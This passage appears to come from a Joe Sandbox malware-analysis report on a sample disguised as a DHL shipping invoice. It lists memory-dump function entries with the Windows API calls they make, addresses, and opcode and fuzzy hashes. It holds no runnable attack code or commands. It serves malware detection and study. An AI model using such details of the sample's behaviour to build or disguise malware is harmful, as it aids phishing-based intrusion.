                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                      • Opcode ID: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                                                                                                                                                                                                      • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                      • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                                      • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %u.%u%s%s
                                                                                                                                                                                                                                      • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                      • Opcode ID: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
                                                                                                                                                                                                                                      • Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3465190E,?,?,00000000,?,00000000), ref: 34651643
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,3465190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3465165A
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,3465190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 34651661
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3465190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 34651686
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                                                                                                      • Opcode ID: 6a6da20944ba43f78811d1d98b9b859afa4cd7ddcb22fded4216a2970c7a161e
                                                                                                                                                                                                                                      • Instruction ID: 6acc36aa470563ff3b1776eaf5bc8f199695cf1ca24d1758da1203111bcadcde
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a6da20944ba43f78811d1d98b9b859afa4cd7ddcb22fded4216a2970c7a161e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F21AA76900204FFDB04DF55DC84EFE77B8EF88714F14809AE504AB191EB34A94687A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 3465715C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 3465717F
                                                                                                                                                                                                                                        • Part of subcall function 346556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 34655702
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 346571A5
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 346571C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1794362364-0
                                                                                                                                                                                                                                      • Opcode ID: e0ff891e06c4a401122f1883005e6b8d2a90f5eb15a26616ba8bbb1700cf04bb
                                                                                                                                                                                                                                      • Instruction ID: 0c2b9d3860bfadd695caf09351b90a05fbfc6e335124f95119f77c3d51aab8ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ff891e06c4a401122f1883005e6b8d2a90f5eb15a26616ba8bbb1700cf04bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A01F7B6601215BF33216EB69C8CC7F3A6DDEC2AA275841ADBC04D7250EE609C0281B9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(3465C7DD), ref: 3465C7E6
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3465C7DD), ref: 3465C838
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3465C860
                                                                                                                                                                                                                                        • Part of subcall function 3465C803: GetProcAddress.KERNEL32(00000000,3465C7F4), ref: 3465C804
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1646373207-0
                                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction ID: ed17c27d25a91f66cb6eb04af661e4b73056a073f33d3f5fe8d2bed6a988e7c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8801F144A45B51BCBB119E740C01ABA6FEC9B377A0B101BDAE150D71B3D9A4850EC3FB
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                                                                                                      • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                                                                                                                      • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,34651D66,00000000,00000000,?,34655C88,34651D66,00000000,00000000,00000000,?,34655E85,00000006,FlsSetValue), ref: 34655D13
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,34655C88,34651D66,00000000,00000000,00000000,?,34655E85,00000006,FlsSetValue,3465E190,FlsSetValue,00000000,00000364,?,34655BC8), ref: 34655D1F
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,34655C88,34651D66,00000000,00000000,00000000,?,34655E85,00000006,FlsSetValue,3465E190,FlsSetValue,00000000), ref: 34655D2D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: 394b8d4dd51aba93d35ef080d8a17ca99404c634bc8e4054c3e3c36519d6a198
                                                                                                                                                                                                                                      • Instruction ID: cee4f0e5273b9793ac92df35b0b982ebe9a7f8f67532bd4fb2c21a91e749cfd4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 394b8d4dd51aba93d35ef080d8a17ca99404c634bc8e4054c3e3c36519d6a198
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D01F73B701322BBD3518E689C5CA46375CEF057E1B1147A6F909E7195DB30D842CAE9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3449924974-0
                                                                                                                                                                                                                                      • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                                      • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                      • Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                                      • Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 004052C5
                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                                                                                                                                                                                                                        • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                                      • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,0043F000,0040338D,00441000,00441800,00441800,00441800,00441800,00441800,757C3420,004035D9), ref: 00405E18
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                      • String ID: nsa
                                                                                                                                                                                                                                      • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                      • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetOEMCP.KERNEL32(00000000,?,?,34656C7C,?), ref: 34656A1E
                                                                                                                                                                                                                                      • GetACP.KERNEL32(00000000,?,?,34656C7C,?), ref: 34656A35
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423808358146.0000000034651000.00000040.00001000.00020000.00000000.sdmp, Offset: 34650000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808326497.0000000034650000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423808358146.0000000034666000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_34650000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: |le4
                                                                                                                                                                                                                                      • API String ID: 0-2019465515
                                                                                                                                                                                                                                      • Opcode ID: 00306c82b3b46b95708d25afda6b059faf1cc36c2bb2dbcbbb05a4546989a4d5
                                                                                                                                                                                                                                      • Instruction ID: bcf0410405e4813edcabf7e5c183545b6c8668857c8392bd8f2b3343229e57a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00306c82b3b46b95708d25afda6b059faf1cc36c2bb2dbcbbb05a4546989a4d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17F03730900209EBEB10DF68D44876C7774FB90335F148398E4289A1F5EBB66996CB46
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 004058B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                      • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                                      • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.423788838163.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788805034.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788872349.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788907779.000000000040A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.423788947464.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
